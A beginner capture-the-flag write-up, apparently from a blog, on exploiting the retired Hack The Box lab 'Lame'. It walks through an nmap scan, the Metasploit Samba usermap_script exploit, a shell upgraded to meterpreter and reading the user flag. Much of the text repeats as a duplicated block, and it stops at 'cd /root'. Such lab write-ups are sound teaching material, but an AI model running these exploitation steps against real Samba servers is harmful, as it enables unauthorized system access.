Hello friends!! Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have a collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab, therefore, we have chosen retried Lame lab.
Level: Beginners
Task: find user.txt and root.txt file in the victim’s machine.
Let’s begin the Game!!
Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.3
From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or Linux.
From nmap result we saw samba service smbd 3.x is running in victim’s machine therefore next I search for any exploit related to this service in Google.
Gratefully Google gave me hint in their 2nd link of exploit DB.
Then I run the msfconsole command in terminal and load Metasploit framework for using Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution module for exploiting target machine.
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploit
Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.
I had updated command shell into the meterpreter shell by executing the following command.
sessions -u 1
Inside path: /home/makis I found the user.txt file and used cat “filename” command for reading this file.
cd /home
ls
cd makis
ls
cat user.txt
Great!! We got our 1st flag successfully
Inside path: /root I found the root.txt file and used cat “filename” command for reading this file.
cd /root
Level: Beginners
Task: find user.txt and root.txt file in the victim’s machine.
Let’s begin the Game!!
Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.
nmap -sV 10.10.10.3
From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or Linux.
From nmap result we saw samba service smbd 3.x is running in victim’s machine therefore next I search for any exploit related to this service in Google.
Gratefully Google gave me hint in their 2nd link of exploit DB.
Then I run the msfconsole command in terminal and load Metasploit framework for using Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution module for exploiting target machine.
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploit
Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.
I had updated command shell into the meterpreter shell by executing the following command.
sessions -u 1
Inside path: /home/makis I found the user.txt file and used cat “filename” command for reading this file.
cd /home
ls
cd makis
ls
cat user.txt
Great!! We got our 1st flag successfully
Inside path: /root I found the root.txt file and used cat “filename” command for reading this file.
cd /root